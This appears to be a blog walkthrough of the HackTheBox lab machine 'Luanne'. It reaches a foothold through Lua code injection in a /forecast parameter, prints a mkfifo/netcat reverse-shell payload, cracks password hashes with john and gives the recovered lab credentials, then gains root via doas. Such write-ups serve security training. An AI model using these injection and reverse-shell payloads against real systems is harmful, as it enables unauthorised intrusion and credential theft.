Hackthebox Luanne Writeup

Hackthebox Luanne Writeup



It is a openBSD machine which has some directory enumeration and mostly all the steps are based on enumeration.Making the initial foothold may take time but over all a great machine .

Hackthebox Luanne Writeup

Video Solution

Steps involved

1-Port Scan 
2-Enumerating website 
3-Directory enumeration 
4-Making of perfect payload
5-Getting reverse shell
6-Getting webapi_user password
7-Getting ssh keys for the user 
8-Opening the backup files
9-Using doas for getting root 

Port Scan

Hackthebox Luanne Writeup

Enumerating website

Port 80 shows authentication error.

Hackthebox Luanne Writeup

It also also has a local service running locally which we can use after we are inside the system.

Inside the robots.txt we got /weather which we already have from the nmap result.

So let’s see it

Hackthebox Luanne Writeup

Directory Enumeration

So let’s Do a directory enumeration to see if we can get some thing.

Hackthebox Luanne Writeup

Now I got /forecast

so let’s have a look at it.

Making of perfect payload

Hackthebox Luanne Writeup

It says use “city=list” . I think some execution is being done at the back end so let’s try to get a reverse shell with this.

So now it’s time to make a payload.

From the nmap result it is clear that OS is NetBSD.

Hackthebox Luanne Writeup
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f

First i tried simply this payload but it did not worked .Then the name of the suggested me that maybe it has some thing to do with lua script.

Hackthebox Luanne Writeup

After knowing all this i made my payload and url encoded it .

');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f")--

Final payload


Getting reverse shell

So I got shell as httpd.

Hackthebox Luanne Writeup

Getting webapi_user password

Also got .htpasswd which has a password hash.

Used john to crack it.

 ➜ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash 
 ➜ sudo john --show hash                                              
 [sudo] password for nagendra: 
 1 password hash cracked, 0 left

Here are the creds now webapi_user:iamthebest.

I used to login into the site but nothing came .

Hackthebox Luanne Writeup

All these we have used earlier only.

Getting ssh keys for the user

I then remember that when i got the authentication error i also got a redirection link which was running on localhost.

$ netstat -aan
Hackthebox Luanne Writeup

after a little enumeration i found that there was a user name

r.michaels and so i thought to curl the ssh keys of it's using the webapi_user creds.
curl --user webapi_user:iamthebest

After saving the ssh keys with 600 permission i was ready to login into the user.

Hackthebox Luanne Writeup

So we got the user.txt .

Opening the backup file

Moving forward to root.And there is a backup file .But it is encrypted to let’s decrypt it .And then extract it .

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/whatinfotech.tar.gz
Hackthebox Luanne Writeup

In the backup file got another hash .Let’s use john again.

 ➜ sudo john --show hash2                                             
 [sudo] password for nagendra: 
 1 password hash cracked, 0 left

Using doas for getting root

Now the new password is littlebear.

I tried to use sudo su but didn’t worked .

It was a easy machine so i thought may be this is the password of root.

but the machine didn’t had the sudo .But I searched for the alternative of sudo in openBSd and got to know that we can use doas .

Hackthebox Luanne Writeup

And we successfully rooted it.

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 5

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

4 thoughts on “Hackthebox Luanne Writeup

Leave a Comment